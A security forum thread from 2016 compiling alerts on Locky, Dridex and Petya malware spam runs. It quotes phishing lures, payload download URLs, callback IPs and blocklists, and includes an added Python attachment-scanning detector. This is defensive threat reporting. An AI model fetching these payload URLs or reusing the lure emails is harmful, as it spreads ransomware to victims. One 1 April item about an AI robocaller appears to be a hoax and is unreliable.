Attached is a file 9758W-TERREDOC-RS62937-15000.zip which comes in at least -eight- different versions each containing a -different- malicious-script (VirusTotal results [1] [2]... The Malwr reports for those samples [9] [10]... show a malicious binary downloaded from:
store.brugomug.co.uk/765f46vb.exe
ggbongs .com/765f46vb.exe
dragonex .com/765f46vb.exe
homedesire .co.uk/765f46vb.exe
scorpena .com/765f46vb.exe
pockettypewriter .co.uk/765f46vb.exe
enduro .si/pdf/765f46vb.exe
185.130.7.22 /files/qFBC5Y.exe
Note that the last file is not like the others. There may be other download locations. The "765f46vb" binary has a detection rate of 4/57* and according to all those previous reports... the malware phones home to:
83.217.8.127 (Park-web Ltd, Russia)
84.19.170.249 (300GB.ru, Russia / Keyweb, Germany)
185.117.72.94 (Host Sailor, Netherlands)
91.200.14.73 (SKS-Lugan, Ukraine)
92.63.87.134 (MWTV, Latvia)
176.31.47.100 (OVH, Germany / Unihost, SC)
All of those look like pretty shady neighbourhoods, although I haven't examined them closely at this point. The payload is the Locky ransomware. The other binary appears to be -another- version of Locky which appears to phone home to the -same- servers.
Recommended blocklist:
83.217.8.127
84.19.170.249
185.117.72.94
91.200.14.73
92.63.87.134
176.31.47.100
"
1] https://www.virustot...a0b48/analysis/

2] https://www.virustot...sis/1459182332/

9] https://malwr.com/an...jE2NjAxYjQ1NTY/
Hosts
77.234.131.73
109.235.139.64
185.130.7.22


10] https://malwr.com/an...mM2ZmE1NmI1MjI/
Hosts
50.56.106.21
83.217.8.127


* https://www.virustot...fdb31/analysis/
TCP connections
91.200.14.73
 



Edited by AplusWebMaster, 28 March 2016 - 12:44 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1686 AplusWebMaster


Posted 29 March 2016 - 05:43 AM

FYI...

Fake 'Credit Card Declined' SPAM - JS malware
- https://myonlinesecu...764-js-malware/
29 Mar 2016 - "An email with the subject of 'Credit Card Has Been Declined *9764' [random numbered] pretending to come from random senders  with a zip attachment is another one from the current bot runs which downloads what looks like it is supposed to be locky ransomware... The email looks like:
From: Shirley brackenbury <brackenburyShirley12280@ covertech .com.br>
Date: Tue 29/03/2016 10:03
Subject: Credit Card Has Been Declined *9764
Attachment: copy_ellie_631312.zip
    Your credit card has been declined, cancellation notice is enclosed down below.


29 March 2016: copy_ellie_631312.zip: Extracts to: info_614949608.js and a copy named 290_info_571294222.lib
 Current Virus total detections 0/58*. MALWR** shows an attempted download from
 http ://teknosolar .com/CLVrSc.exe which is currently giving a 404 not found...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459242165/

** https://malwr.com/an...zRkZGZkYzgwNzM/
Hosts
185.18.196.201: https://www.virustot...01/information/
>> https://www.virustot...37dba/analysis/
___

Fake 'Payment' SPAM – doc macro malware
- https://myonlinesecu...-macro-malware/
29 Mar 2016 - "An email with the subject of [random name] 'payment/invoice/report/message/Transaction' pretending to come from the same random name but a totally different email address with a random numbered malicious word doc attachment is another one from the current bot runs... One of the emails looks like:
From: Emerson Sherman <accounts@ rapicutcarbides .com>
Date: Tue 29/03/2016 05:10
Subject: Emerson Sherman. Payment
Attachment: 14385.doc
    Good day
    I hope you had a good weekend.
    Please find the payment confirmation enclosed with this email. The Transfer should appear on your bank within 1 day.  
    Thanks
    Emerson Sherman


29 March 2016: 14385.doc - Current Virus total detections 8/58[1] 7/57[2]
.. Payload Security* shows a download from http ://www .setabayloan .com/sg1.jpg?YSbs= which gave 585816.exe
(VirusTotal 9/57**) and is definitely Dridex banking Trojan. This Dridex affiliate uses jpg images on a website that the macro decodes and extracts the .exe file. That way a victim only sees the genuine image in their temp folders or briefly displayed...
> https://myonlinesecu...setabayloan.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1459229375/

2] https://www.virustot...sis/1459226242/

* https://www.reverse....environmentId=4
Contacted Hosts
129.121.192.16: https://www.virustot...16/information/
>> https://www.virustot...765d7/analysis/
87.117.242.13

** https://virustotal.c...58d7e/analysis/
___

Fake 'New Order' SPAM - malicious attachment
- http://blog.dynamoo....2016280375.html
29 Mar 2016 - "This -fake- financial spam comes with a malicious attachment:
    From:    Rose Lu [salesdeinnovative@ technologist .com]
    Date:    29 March 2016 at 02:30
    Subject:    Re: New Order P2016280375
    Good Day,
    Please find enclosed our new order P2016280375 for your kind attention and prompt execution.
    I look forward to receiving your order acknowledgement in due course.
    Best regards
    Rose Lu
    Office Manager
    Suzhou  Eagle Electric Vehicle Manufacturing Co., Ltd.
    Add: No.99, Yin Xin Road, Guo Xiang Town, Suzhou, China ...


Attached is a file New Order P201628037.docx which I have seen a single variant of, with a VirusTotal detection rate of 8/58*. The Malwr report** is inconclusive, but does appear to show an OLE embedded object within the Word document. There are some interesting strings near the beginning of the object..
Crypted.exe
C:\Users\user\Desktop\Crypted.exe
C:\Users\user\AppData\Local\Temp\Crypted.exe
So, this looks like ransomware. Some inexpert fiddling with the contents of the OLE file yields an executable, and automated reports [1] [2] [3] show network traffic to the domain marchborn .no-ip .biz hosted on: 105.112.39.114 (Airtel, Nigeria)
I strongly recommend that you -block- traffic to that IP. In fact, the entire very large 105.112.0.0/12 is very sparsely populated and contains a small handful of legitimate Nigerian domains plus a load of Dynamic DNS domains (I've recommended blocking those before***) so you might want to consider -blocking- those too."
* https://www.virustot...2ece1/analysis/

** https://malwr.com/an...TYyMzE1MTYzZTk/

1] https://malwr.com/an...DgzODViNmE5ZGY/
Hosts
105.112.39.114

2] https://www.hybrid-a...environmentId=1
Contacted Hosts
105.112.39.114

3] https://sandbox.deep...8ab956bb66e3c0/

*** http://blog.dynamoo....ht-want-to.html
___

Fake 'Sent from my iPhone' SPAM - leads to Locky ransomware
- http://blog.dynamoo....-sent-from.html
29 Mar 2016 - "... These spam emails look like the victim is sending them to themselves (but they aren't*). Reference numbers vary a little between emails, but the basic pattern is:
    From:    victim
    To:    victim
    Date:    29 March 2016 at 17:50
    Subject:    CCE29032016_00034
      Sent from my iPhone


Attached is a RAR archive with a name that matches the subject (e.g. CCE29032016_00034.rar) and this contains a malicious .js file that leads to Locky ransomware. My contact tells me that the download locations in the scripts are:
This payload has a detection rate of 4/56**. The malware calls back to:
84.19.170.249 (Keyweb, Germany / 300GB.ru, Russia)
5.135.76.18 (OVH, France / Bondhost, Montenegro)
109.234.35.128 (McHost, Russia)
McHost is almost purely a black-hat ISP in my opinion and should be blocked-on-sight.
Recommended blocklist:
84.19.170.249
5.135.76.18
109.234.35.0/24
"
* http://blog.dynamoo....yself-spam.html

** https://www.virustot...76760/analysis/
TCP connections
84.19.170.249: https://www.virustot...49/information/
>> https://www.virustot...fcd59/analysis/

5.135.76.18: https://www.virustot...18/information/
>> https://www.virustot...b5e43/analysis/

109.234.35.128: https://www.virustot...28/information/
>> https://www.virustot...fc893/analysis/
___

Locky ransomware downloads -hijacked- by vigilante - delivering Eicar test file...
- https://myonlinesecu...t-file-instead/
29 Mar 2016 - "Another set of -empty/blank- emails that pretend to come from your own email address. This particular bunch have multiple subjects but all starting with 'CCE29032016' and attachments that also start with 'CCE29032016'. Some of the subjects and attachments I have seen include:
    CCE29032016_00095.jpg
    CCE29032016_00065.docx
     CCE29032016_00067.tiff
    CCE29032016_00050.pdf
    CCE29032016_00002.gif
These are obviously designed to make you think they are coming from a printer, scanner or Multi-functional device on your network. They are -not- image or word files despite the extensions and icons saying they are:
> https://myonlinesecu.../fake-files.png
These attachments are -not- what they appear to be and are actually renamed zip files with the icons of the files they pretend to be, containing a js file. These files download what is -supposed- to be Locky ransomware from several locations. The ones I have discovered so far include:
    http ://chilloutplanet .com/ty43ff333.exe
    tbde. com .vn/ty43ff333.exe
    canadattparts .com/ty43ff333.exe
... add to the twist all the files that I have seen are -not- Locky ransomware but instead all of these already compromised sites have been discovered  by what we think is a “white hat” hacker vigilante who has replaced the locky files with a “safe” file that contains the words 'STUPID LOCKY' then a load of symbols that I won’t post here and EICAR-STANDARD-ANTIVIRUS-TEST-FILE. This would or should be flagged by EVERY antivirus in existence as the Eicar test file (and for that reason I will not post it even in plain text, because many antiviruses would immediately block access to this site). See screenshot:
> https://myonlinesecu...tupid-locky.png
It looks like most 'victims' will have been lucky this time, although I am sure there will be some sites in this malspam run that didn’t get discovered by the vigilante and -continue- to infect victims... -Never- attempt to open a zip directly from your email, that is a guaranteed way to get infected. The best way is to just -delete- the unexpected zip and not risk any infection."

chilloutplanet .com: 109.71.69.138: https://www.virustot...38/information/

tbde. com .vn: 162.243.4.79: https://www.virustot...79/information/

canadattparts .com: 104.131.133.51: https://www.virustot...51/information/
>> https://www.virustot...00c4d/analysis/
___

'Petya' ransomware encrypts files, disks, locks users out of computers
- https://www.helpnets...ocks-computers/
March 29, 2016 - "A -new-  type of ransomware does not only encrypt the victims’ files, but also their disk’s Master File Table (MFT), and it replaces the boot drive’s existing Master Boot Record (MBR) with a malicious loader. It makes the entire computer -unusable- until the ransom is paid or until the victims decide to cut their losses, repair the MBR themselves, and reinstall Windows. The ransomware is called Petya, and is currently being delivered via spear-phishing campaigns aimed at German companies’ HR departments. The -fake- emails are made to look like they are coming from a legitimate job seeker, and instruct the recipient to download the sender’s CV from a Dropbox account. If the recipient falls for the trick, downloads the file, fails to notice that it’s an executable and runs it, the computer will crash because Petya overwrites the MBR of the entire hard drive. The computer will then show the infamous “Blue Screen of Death,” and reboot. The next thing the victim sees is a -fake- CHKDSK notice:
> https://www.helpnets...fake-chkdsk.jpg
GData researchers have examples* of the spear-phishing emails, and a video of Petya in action. Trend Micro researchers confirmed** that the ransomware encrypts both part of the disk and victims’ files. They have also notified Dropbox of the fact that their service is being used to propagate the malware, and the company has removed the malicious file along with other links that stored the same file. The malware doesn’t allow the user to restart the computer in Safe Mode. According to Bleeping Computer’s Lawrence Abrams, there is currently no way to restore the files without paying the ransom, nor to decrypt the MFT. Users can repair the MBR and reinstall Windows, but all their files will be lost..."
* https://blog.gdataso...pts-hard-drives

** http://blog.trendmic...sers-computers/

 

Video 0:51 > http://arstechnica.c...ypts-hard-disk/
 



Edited by AplusWebMaster, 30 March 2016 - 01:34 PM.

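An added example (not code from the quoted posts or their authors) for the two tricks described in this post and the one above it: an .exe renamed to 122.wav, and zip archives carrying image/document names and icons with a .js inside. It judges attachments by their leading bytes instead of their names, flags double extensions such as .tiff.zip, and opens archives to look for script members; the sample attachments and their contents are constructed here for illustration and are not real malware.

```python
import io
import os
import zipfile

# Leading bytes that identify common container and document types.
MAGIC = [
    (b"MZ", "exe"), (b"PK\x03\x04", "zip"), (b"%PDF", "pdf"),
    (b"\xff\xd8\xff", "jpeg"), (b"\x89PNG", "png"), (b"GIF8", "gif"),
    (b"II*\x00", "tiff"), (b"MM\x00*", "tiff"), (b"RIFF", "riff"),
    (b"Rar!\x1a\x07", "rar"), (b"\xd0\xcf\x11\xe0", "ole"),
]

# Content type(s) each claimed extension is allowed to have.
EXPECTED = {
    ".exe": {"exe"}, ".scr": {"exe"}, ".pdf": {"pdf"},
    ".jpg": {"jpeg"}, ".jpeg": {"jpeg"}, ".png": {"png"}, ".gif": {"gif"},
    ".tif": {"tiff"}, ".tiff": {"tiff"}, ".wav": {"wav"},
    ".zip": {"zip"}, ".rar": {"rar"}, ".doc": {"ole"}, ".xls": {"ole"},
    ".docx": {"zip"}, ".docm": {"zip"}, ".xlsx": {"zip"}, ".xlsm": {"zip"},
}
OOXML = {".docx", ".docm", ".xlsx", ".xlsm"}

# Archive members that should never arrive inside a mailed "image" or "document".
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".exe", ".scr"}


def sniff(data):
    """Classify content by its leading bytes, ignoring the file name entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            if kind == "riff":
                # A RIFF container is only a WAV file if the form type says so.
                return "wav" if data[8:12] == b"WAVE" else "riff"
            return kind
    return "unknown"


def inspect_zip(data, claimed_ext):
    """Look inside a zip for script members, and for OOXML claims with no document inside."""
    findings = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return ["zip signature present but archive is unreadable"]
    for member in names:
        if os.path.splitext(member.lower())[1] in SCRIPT_EXT:
            findings.append(f"archive contains script/executable {member}")
    # Every Office Open XML document carries this part; a "docx" without it is not a document.
    if claimed_ext in OOXML and "[Content_Types].xml" not in names:
        findings.append(f"{claimed_ext} claimed but no Office document parts inside")
    return findings


def assess_attachment(name, data):
    """Return a list of findings for one attachment; an empty list means nothing suspicious."""
    findings = []
    root, ext = os.path.splitext(name.lower())
    inner_ext = os.path.splitext(root)[1]
    kind = sniff(data)
    # Double extension such as FILE-57146596.tiff.zip: the visible part hides the archive.
    if inner_ext in EXPECTED and inner_ext != ext:
        findings.append(f"double extension {inner_ext}{ext}")
    # Content that does not match the claimed extension (a .wav that starts with MZ).
    if ext in EXPECTED and kind not in EXPECTED[ext]:
        findings.append(f"extension {ext} but content is {kind}")
    if kind == "exe":
        findings.append("executable content")
    if kind == "zip":
        findings.extend(inspect_zip(data, ext))
    return findings


def make_zip(members):
    """Build an in-memory zip from {name: bytes}; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member, content in members.items():
            zf.writestr(member, content)
    return buf.getvalue()


# Constructed sample attachments mirroring the patterns in the posts above (not real malware).
SAMPLES = {
    "122.wav": b"MZ\x90\x00" + b"\x00" * 60,                    # renamed .exe, not audio
    "CCE29032016_00095.jpg": make_zip({"CCE29032016_00095.js": b"// constructed"}),
    "FILE-57146596.tiff.zip": make_zip({"414-7888138-1994311.js": b"// constructed"}),
    "Deposit Slip.exe": b"MZ" + b"\x00" * 62,                   # plain executable attachment
    "report.pdf": b"%PDF-1.4\n% constructed benign sample\n",
    "status.docx": make_zip({"[Content_Types].xml": b"<Types/>",
                             "word/document.xml": b"<w:document/>"}),
}


def scan_all(samples=SAMPLES):
    """Assess every sample and return {name: findings}."""
    return {name: assess_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(f"{name}: {findings or 'OK'}")
```

The same checks apply equally well at a mail gateway, before the attachment ever reaches a user who has file extensions hidden.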


#1687 AplusWebMaster


Posted 30 March 2016 - 03:36 AM

FYI...

- https://atlas.arbor....ndex#-318909613
"... At the present, Locky developers are completely reliant upon some level of user interaction. Educating your workforce on potential threats and the overall threat vectors is still the best way to inhibit threats like Locky."

Fake 'Additional Info' SPAM - leads to ransomware
- http://blog.dynamoo....nformation.html
30 Mar 2016 - "This spam has a malicious attachment, leading to ransomware.
    From:    Joe holdman [holdmanJoe08@ seosomerset .co.uk]
    Date:    30 March 2016 at 08:55
    Subject:    RE: Additional Information Needed #869420
    We kindly ask you to provide us additional information regarding your case.
    Please find the form attached down below.


The reference number varies in the subject. The attachment is a ZIP file containing elements of the recipient's email address and words like "copy" or "invoices" plus a random number. These unzip into a folder called "letter" to give a .js file beginning with "letter_" and a .wrn file which also appears to be a script but which won't run by default. An analysis of three scripts [1] [2] [3] shows binary downloads from:
cainabela .com/zFWvTM.exe
downloadroot .com/vU4VAZ.exe
folk.garnet-soft .com/jDFXfL.exe
This binary has a detection rate of 6/56*. Automated analysis [4] [5] shows network traffic to:
93.170.131.108 (Krek Ltd, Russia)
5.135.76.18 (OVH, France / Bondhost, Montenegro)
82.146.37.200 (TheFirst-RU, Russia)
These characteristics are consistent with Locky ransomware.
Recommended blocklist:
93.170.131.108: https://www.virustot...08/information/
>> https://www.virustot...9c486/analysis/
5.135.76.18: https://www.virustot...18/information/
>> https://www.virustot...227df/analysis/
82.146.37.200: https://www.virustot...00/information/
>> https://www.virustot...cbbd2/analysis/
"
1] https://www.virustot...sis/1459325489/

2] https://www.virustot...sis/1459325501/

3] https://www.virustot...sis/1459325510/

* https://www.virustot...sis/1459325587/

4] https://www.hybrid-a...environmentId=4

5] https://sandbox.deep...0292fcc77cd45e/
___

Fake 'scanner, prtr' SPAM - leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
20 Mar 2016 - "... another series of emails that pretend to be coming from a scanner, printer or multifunctional device at your own email domain with a zip attachment is another one from the current bot runs... In exactly the same way as one of yesterday’s malspam runs* the subjects pretend to be emailing an image or document file:
* https://myonlinesecu...t-file-instead/
Some of the subjects seen today include:
    Emailing: FILE-57146596.tiff
    Emailing: docment-6419593.tiff
    Emailing: sheet 462244150.JPEG
    Emailing: DOC-109.JPEG
    Emailing: file_29.TIFF
    Emailing: list-51210168.docx ...
One of the emails looks like:
From: CANON <CANON@ your-own-email-domain >
Date: Wed 30/03/2016 12:41
Subject: Emailing: FILE-57146596.tiff
Attachment:FILE-57146596.tiff.zip
    Your message is ready to be sent with the following file or link attachments:
    FILE-57146596.tiff
    Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments. Check your e-mail security settings to determine how attachments are handled...


30 March 2016: FILE-57146596.tiff.zip: Extracts to: 414-7888138-1994311.js - Current Virus total detections 5/56*
 downloads Locky ransomware from
 http ://tmecvn .com/45t3443r3 (VirusTotal 9/56**). Other download locations... include:
... and I am sure loads of others will appear during the day... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459336685/

** https://www.virustot...sis/1459341039/
TCP connections
5.135.76.18: https://www.virustot...18/information/
>> https://www.virustot...227df/analysis/
___

Fake -Multiple- Subjects/senders/content SPAM - download Locky ransomware
- https://myonlinesecu...cky-ransomware/
30 Mar 2016 - "... a whole series of -different- email -subjects- and body-content coming from random-senders downloading Locky ransomware from multiple-places...
Some of the subjects include:
    FW:Expenses Report # 109681 – 03/2016
    payment confirmation
    Additional Costs
    recent bill
    RE: Additional Information Needed #075573


The bodies of these emails have -varied- content like these:
    We kindly ask you to provide us additional information regarding your case.
    Please find the form attached down below.

-Or-
    Dear xerox.774,
    Please see attached file regarding clients recent bill. Should you need further assistances lease feel free to email me.
    Best regards
    Cleo Morris
    Chief Executive Officer


... These -all- download Locky ransomware from -various- sites, some of which include:
    http ://drirenaeris .com.au/b7eir  (VirusTotal 3/56*)
    http ://fabiocaminero .com/2L5pGE.exe  (VirusTotal 7/56**)
    http ://cssrd.org.lb/VPNQ4Z.exe  (VirusTotal 7/56***) ...
These are -more- of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459341652/
TCP connections
51.254.240.45: https://www.virustot...45/information/
>> https://www.virustot...2e2bd/analysis/

** https://www.virustot...sis/1459343160/

*** https://www.virustot...sis/1459343160/

- http://blog.dynamoo....s-leads-to.html
30 Mar 2016 - "... -another- malicious spam run... drops Locky ransomware. Again... phones home to the -same- IPs reported here[1]."
1] http://blog.dynamoo....nformation.html
___

Fake 'scanned document' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
29 Mar 2016 - "An email with the subject of 'scanned document' pretending to come from Tara Savill <tara@ charismabathrooms .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...nt-1024x642.png

29 March 2016: CCF26062014_00002.docm - Current Virus total detections 7/57*
.. MALWR** shows a download of Dridex banking malware from
 http ://1901.magflags .de/media/5478hj.exe
Other sites: some of which were also in THIS earlier run*** ... include:
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459249209/

** https://malwr.com/an...mUzZmEzZmIxMTQ/
Hosts
144.76.126.6: https://www.virustot....6/information/
>> https://www.virustot...62087/analysis/

*** https://myonlinesecu...-macro-malware/
 



Edited by AplusWebMaster, 30 March 2016 - 09:30 AM.



#1688 AplusWebMaster


Posted 31 March 2016 - 05:46 AM

FYI...

Fake 'Print' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
31 Mar 2016 - "A series of emails with the basic subject of 'print' pretending to come from random names with a number at Gmail .com with a zip attachment is another one from the current bot runs which downloads Locky ransomware... Some of the subjects I have seen so far include:
    print please
    hi prnt
    print
    hello print

One of the emails looks like:
From: admin <andrew03@ gmail .com>
Date: Mon 04/01/2016 13:31
Subject: print please
Attachment: New Text Document (3).rar
–40719049546ef6119a6e83c9e005
Content-Type: text/plain; charset=UTF-8
–40719049546ef6119a6e83c9e005
Content-Type: text/html; charset=UTF-8
<div dir=”ltr”><br></div>
–40719049546ef6119a6e83c9e005–
–bf5dda1905937f96d0871d6d3006
Content-Type: application/octet-stream; name=”New Text Document (3).rar ...


31 March 2016: New Text Document(3).rar: Extracts to: New Text Document(95).js - Current Virus total detections 4/57*
.. MALWR** didn’t show any download but a manual analysis of the JS file gave me Locky Ransomware from
 http ://bianca .com .tr/87h78rf33g (VirusTotal 4/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459419468/

** https://malwr.com/an...jZjYTI5ZjJiY2M/

*** https://www.virustot...sis/1459419544/
TCP connections
88.198.119.177: https://www.virustot...77/information/
___

Fake 'FaxEmail' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
31 Mar 2016 - "An email with the subject of 'FaxEmail Fax from 0632136978' (random number) pretending to come from random number @ f2em .com with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: https://myonlinesecu...78-1024x585.png

31 March 2016: 783836325-7101s-452012.zip: Extracts to: 21255715-6613c-370201.js
 Current Virus total detections 4/56*. MALWR** shows a download of Locky Ransomware from
 http ://mentaldevelopment .ir/87h78rf33g (VirusTotal 3/57***)
Other download locations so far discovered include:
 http ://meimeiwang .com.cn/87h78rf33g
 remontobuvidoma .ru/87h78rf33g (giving a '404 not found')
 anop .ir/87h78rf33g
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459428459/

** https://malwr.com/an...TJmZjNiZjkzODE/
Hosts
185.8.173.39
81.177.181.164


*** https://www.virustot...sis/1459428606/
TCP connections
88.198.119.177
___

Fake 'Photos' SPAM - JS malware delivers Locky ransomware
- https://myonlinesecu...cky-ransomware/
31 Mar 2016 - "A blank/empty email with the subject of 'Photos' pretending to come from Nadia María Ochoa <nadia_m_ochoa018@ yahoo .es> (random numbers after nadia_m_ochoa) with a zip attachment is another one from the current bot runs... The email looks like:
From: Nadia María Ochoa <nadia_m_ochoa018@ yahoo .es>
Date: Thu 31/03/2016 14:32
Subject: Photos
Attachment: Photos.zip


Body content: Totally Blank

31 March 2016: Photos.zip: Extracts to: 84628561-8282f-490006.js - Current Virus total detections 4/57*
.. downloads Locky ransomware from
 site.ipark .tur.br/87h78rf33g (VirusTotal 3/57**). Other sites discovered include
 http ://mrsweeter .ru/87h78rf33g which is currently giving a '404' although was used earlier today for delivering Locky. It is almost certain that all the sites in THIS*** post which are delivering the same Locky ransomware file will also be used in a -differing- version of this email... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459431093/

** https://www.virustot...sis/1459428606/
TCP connections
88.198.119.177: https://www.virustot...77/information/
>> https://www.virustot...21a7d/analysis/

*** https://myonlinesecu...cky-ransomware/
 



Edited by AplusWebMaster, 31 March 2016 - 09:56 AM.



#1689 AplusWebMaster


Posted 01 April 2016 - 05:56 AM

FYI...

Fake 'REFUND DEPOSIT' SPAM - fake PDF malware
- https://myonlinesecu...ke-pdf-malware/
Updated: 1 Apr 2016 - "An email with the subject of 'YOUR REFUND DEPOSIT COPY' pretending to come from Lloyds Bank <refund@ lloydsbank .co.uk> with a zip attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...EPOSIT-COPY.png

31 March 2016: Attach.zip: Extracts to: Deposit Slip.exe - Current Virus total detections 8/57*
.. MALWR** | Payload Security***
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459447576/

** https://malwr.com/an...DFjYzg5ZWQ2NzI/

*** https://www.reverse....environmentId=4
Contacted Hosts
5.254.112.27
___

Fake 'photos' 'selfie' SPAM - JS malware
- https://myonlinesecu...-es-js-malware/
1 Apr 2016 - "... numerous emails with the subject of 'images', 'photos' or 'selfie' pretending to come from random names and numbers at yahoo .es with a zip attachment is another one from the current bot runs which downloads what looks like Locky ransomware... some of these with no extension for the attachment... One of the emails looks like:
From: Maite STEPHENS <GALEANA965@ yahoo .es>
Date: Fri, 01 Apr 2016 10:35:17 +0100
Subject: images
Attachment: Photos(80).zip


Body content: Empty/blank body

1 April 2016: Photos(80).zip: Extracts to: IMG0000024405.js - Current Virus total detections 3/56*
.. downloads what looks like Locky ransomware from
 http ://rhcequestrian .com/89uyg65fyguy (VirusTotal 5/57**)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459503374/

** https://www.virustot...sis/1459503652/
TCP connections
88.198.119.177: https://www.virustot...77/information/
>> https://www.virustot...21a7d/analysis/
___

Fake 'Votre demande' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
1 Apr 2016 - "... an email written in French with the subject of 'Votre demande – 4906548' [random numbered]  pretending to come from Darlene Walden <Darlene.Walden@ gouv .fr> with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: Darlene Walden <Darlene.Walden@ gouv .fr>
Date: Fri 01/04/2016 09:11
Subject: Votre demande – 4906548
Attachment: Cas_4906548.zip
    Monsieur / Madame,
    Nous avons bien recu votre mail nous demandant de ne pas donner suite a votre demande
    d’assurance du 01/04/2016 referencee en marge.
    De ce fait, nous procedons a l’annulation de cette derniere a sa date d’effet et vous
    precisons que vous ne pourriez vous prevaloir d’aucune garantie.
    Pour plus de details s’il vous plait verifier fichier joint (Cas_4906548)
    Nous vous remercions de bien vouloir en prendre note...

Translates to:
    Sir / Madam,
    We have received your mail asking us not to follow your request
    Insurance 04/01/2016 referenced margin.
    Therefore, we proceed to the cancellation of the latter has its effective date and you
    Note that you could avail you of any warranty.
    For more details please check attachment (Cas_4906548)
    Thank you kindly take note...


1 April 2016: Cas_4906548.zip: Extracts to: Cas_2466628.js - Current Virus total detections 3/57*
.. Payload Security** shows a download of Locky Ransomware from
 tag2change .com/images/old/note.exe (VirusTotal 2/56***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459501792/

** https://www.reverse....environmentId=4
Contacted Hosts
108.175.14.122: https://www.virustot...22/information/
>> https://www.virustot...9e550/analysis/

*** https://www.virustot...sis/1459502285/
___

Fake 'boss scams' meet AI robocallers - dangerous escalation of Fraud
- http://blog.dynamoo....callers-in.html
1 Apr 2016 - "Many of us will be familiar with the 'fake boss' scam. You're sitting at your desk when your CEO suddenly calls and asks you to transfer a large stack of currency to some shady-bank-account for a business transaction you are not allowed to talk about. This type of -fraud- is simple and can often pay out big bucks, but it is also labour intensive. Research has to be done on companies and -convincing- calls have to be made to unsuspecting-minions. Not only does this all take some time, but the more people involved in the scam then the more ways you have to split the booty.. and the greater the chance of getting caught.
Now, the notorious Russian gang dubbed 'Den Duraka' by researchers have been discovered using a cunning new technique which makes this type of attack even more dangerous. Instead of relying on human beings to make the phone calls, they have now enrolled an AI-powered robocalling system called which promises to be a game-changer. Sporting the clumsy Russian acronym 'LOZHNYY', this is deeply integrated into LinkedIn, Facebook, Twitter and other social networks, with feeds into business directories using -hacked- credentials. Once it has found a CEO to impersonate, it scours the web for video and audio clips to get an idea of accents and mannerisms, and then it starts to research company filings and financial data. All of this is then combined with a wide range of pre-prepared scripts and some basic question-and-answer scenarios to make a deadly weapon in the hands of the scammers. Some of the conversational AI features are rudimentary, and LOZHNYY sometimes resorts to buzzword-laden nonsense when out of its depth. Victims report that they were -not- suspicious as this seemed consistent with the behaviour of their CEOs. Cybersecurity experts are struggling with ways to counter this new threat. At the moment their best advice is to completely -ignore- any communications from your CEO and indeed any C-level executive..."
___

Petya Ransomware - Malwarebytes analysis
- https://blog.malware...tya-ransomware/
April 1, 2016 - "Petya is different from the other popular ransomware these days. Instead of encrypting files one by one, it denies access to the full system by attacking low-level structures on the disk. This ransomware’s authors have not only created their own boot loader but also a tiny kernel, which is 32 sectors long. Petya’s dropper writes the malicious code at the beginning of the disk. The affected system’s master boot record (MBR) is overwritten by the custom boot loader that loads a tiny malicious kernel. Then, this kernel proceeds with further encryption. Petya’s ransom note states that it encrypts the full disk, but this is not true. Instead, it encrypts the master file table (MFT) so that the file system is -not- readable.
PREVENTION TIP: Petya is most dangerous in Stage 2 of the infection, which starts when the system is rebooted after the BSOD caused by the dropper. To prevent your computer from going automatically to this stage, turn off automatic restart after a system failure (see how to do it):
> https://support.micr...en-us/kb/307973
If you detect Petya in Stage 1, your data can still be recovered. You can find more information about it here:
> https://hshrzd.wordp...ya-key-decoder/
... Behavioral analysis: This ransomware is delivered via scam emails themed as a job application. The e-mail comes with a Dropbox link, where the malicious ZIP is hosted. This initial ZIP contains two elements:
